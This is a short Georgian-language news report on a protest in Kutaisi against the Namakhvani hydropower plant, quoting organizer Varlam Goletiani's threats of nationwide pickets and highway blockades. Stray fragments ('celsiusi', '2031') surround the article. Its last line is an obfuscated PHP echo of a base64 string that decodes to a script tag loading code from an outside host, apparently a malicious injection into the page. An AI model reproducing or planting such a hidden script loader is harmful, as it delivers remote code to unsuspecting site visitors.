celsiusi
ავერსი შნაიდერი
„ნამახვანჰესის“ მშენებლობის მოწინააღმდეგეებმა, ქუთაისის ცენტრში, აქციის მიმდინარეობისას საზოგადოებას სამოქმედო გეგმა გააცნეს.
 
როგორც მათ განაცხადეს, თუ ხელისუფლება არ გადადგამს ადეკვატურ ნაბიჯებს, ისინი ქვეყნის პიკეტირებას მოახდენენ.
 
როგორც აქციის ერთ-ერთი ორგანიზატორი, ვარლამ გოლეთიანი აცხადებს, ხელისუფლება იძულებული გახდება აქციის მონაწილეების ყველა მოთხოვნა შეასრულოს, წინააღმდეგ შემთხვევაში კი გადაკეტავენ ავტობანს და აქციები დედაქალაქში გადმოინაცვლებს.
 
„დღევანდელ ღამეს ვათენებთ აქ. ხვალ, 8:00 საათიდან გადავადგილდებით გუმათში. თუ ხელისუფლება, ჩვენ ამ დაუორგანიზებელ დღევანდელ შეხვედრას კიდევ არ გაითვალისწინებს, არ ექნება მას ადეკვატური ნაბიჯების გადმოდგმის სურვილი ჩვენი მისამართით, ჩვენ დავაორგანიზებთ მთელი საქართველოს მასშტაბით ქვეყნის პიკეტირებას ყველა რეგიონში, ყველა ქალაქში! ჩვენ, დავკეტავთ მათ შორის, ავტობანსაც!
 
ისინი იძულებულები გახდებიან შეასრულონ ყველა ჩვენი სამართლიანი და არგუმენტირებული მოთხოვნა. თუ მთელი ქვეყნის პიკეტირებაც არ გახდება საკმარისი, ჩვენ, ყველა ერთად ყველა მხრიდან დავიძვრებით დედაქალაქში და აქციებს დავიწყებთ“, - აცხადებს გოლეთიანი.
 
2031
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");